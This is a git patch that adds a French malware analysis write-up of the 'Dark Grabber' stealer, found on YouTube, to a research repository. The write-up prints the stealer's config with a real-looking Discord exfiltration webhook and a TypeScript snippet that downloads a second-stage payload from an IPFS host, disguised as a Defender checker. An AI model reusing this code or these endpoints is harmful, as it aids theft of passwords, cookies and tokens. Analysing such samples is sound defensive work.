From 704fe4251592b9505eca2beab73be79377adc33f Mon Sep 17 00:00:00 2001 From: ALittlePatate Date: Mon, 2 Jan 2023 16:05:39 +0100 Subject: [PATCH] add: random malware --- README.md | 1 + Random/Dark Grabber/writeup.md | 61 ++++++++++++++++++++++++++++++++++ Random/readme.md | 2 ++ 3 files changed, 64 insertions(+) create mode 100755 Random/Dark Grabber/writeup.md create mode 100644 Random/readme.md diff --git a/README.md b/README.md index e514d2c..77ac091 100644 --- a/README.md +++ b/README.md @@ -7,6 +7,7 @@ Here you can find a list of the samples present in this repo : * [Quasar](https://github.com/ALittlePatate/Malware-Research/tree/master/Quasar) * [Nanocore](https://github.com/ALittlePatate/Malware-Research/tree/master/Nanocore) * [Hancitor](https://github.com/ALittlePatate/Malware-Research/tree/master/Hancitor) +* [Random malwares found on youtube](https://github.com/ALittlePatate/Malware-Research/tree/master/Random) # Special thanks I want to thank [herrcore](https://github.com/herrcore) for his [videos](https://www.youtube.com/c/OALabs/videos) and [streams](https://www.twitch.tv/oalabslive) about malware analysis, also he was super kind responding to my weird begginer questions on [his discord](https://discord.gg/uBk7wyE8) ! diff --git a/Random/Dark Grabber/writeup.md b/Random/Dark Grabber/writeup.md new file mode 100755 index 0000000..089b67a --- /dev/null +++ b/Random/Dark Grabber/writeup.md @@ -0,0 +1,61 @@ +# Dark Grabber + +Il existe deux versions du stealer, une appelée "Debug" et une "Normale". +
+Les deux sont dans le même .zip et les admins demandent de les lancer les deux. + +*insérer une capture* + +## Version Normale + +Elle est appelée "Install Dark Grabber.bin". +
+[Virustotal](https://www.virustotal.com/gui/file/8a12f091c08d2287409465e04c15d1ce53da419b626565a8e783e22bbe2368f4)
+C'est du Python 3.10 compilé avec pyinstaller.
+On peut utiliser [pyinstxtractor](https://github.com/extremecoders-re/pyinstxtractor) avec [pycdc](https://github.com/zrax/pycdc) pour retrouver la source. +
+On extrait les fichiers : +* antidebug.py +* browsers.py +* config.py +* discordtoken.py +* injection.py +* 'Install Dark Grabber'.py +* startup.py +* systeminfo.py + +C'est un grabber python classique, il récupère les mots de passe des navigateurs, les cookies, les tokens discord et il s'injecte dans discord. + +La config : +```Python +__CONFIG__ = { + 'webhook': 'https://discordapp.com/api/webhooks/1050142994168303628/lSVmYxnWxQ8K0VWpnbteH_ThH9-w6BaI765XntsihgtkSQOzXF2fuL5WRfEZaSGHh9Tp', + 'antidebug': True, + 'browsers': True, + 'discordtoken': True, + 'injection': True, + 'startup': True, + 'systeminfo': True } +``` + +## Version Debug + +Le fichier est appelé "Install Debug Dark Grabber", le nom original est "deno.exe". +
+[Virustotal](https://www.virustotal.com/gui/file/c5e5db042d3a3e12b8484f29594d157268e3c63631f3a0ffd588ff7ad1d42e2f) +
+ +C'est du typescript compilé avec [deno](https://deno.land/), il n'existe pas d'extracteur pour deno mais il stocke le code en clair dans l'exe. On peut le dump avec un éditeur hexadécimal comme [HxD](https://mh-nexus.de/en/hxd/). +
+On extrait le code ci dessous dans **main.ts** : +```typescript +import { download, Destination } from "https://deno.land/x/download/mod.ts"; + +await download("https://bafybeid7gnnacqshr64a6rpn6wevtexbw7kpiv2ckkrcdtnnmdtvd35j2e.ipfs.nftstorage.link/ikiyq", destination); +``` + +Ce code va télécharger ikiyq.exe et l'enregistrer sur le disque à `C:/Users/${username}/` sous le nom `Microsoft-Defender-Checker.exe`. + +`Microsoft-Defender-Checker.exe` est une dropper avec quelques decoys, il va drop `ikiyq.exe` qui est le stage final.
+[Virustotal de ikiyq.exe](https://www.virustotal.com/gui/file/392a8b2d7633da3a89247681ee1161a93f872d5a9ecee88ef8ed6e578225b71d)
+Pour finir, `ikiyq.exe` est du Python compilé avec [Nuitka](https://github.com/Nuitka/Nuitka). diff --git a/Random/readme.md b/Random/readme.md new file mode 100644 index 0000000..ef1755a --- /dev/null +++ b/Random/readme.md @@ -0,0 +1,2 @@ +This folder holds the malware i find regularly on Youtube by searching for "hacking tools". +Not everything is in english but you can use google translate.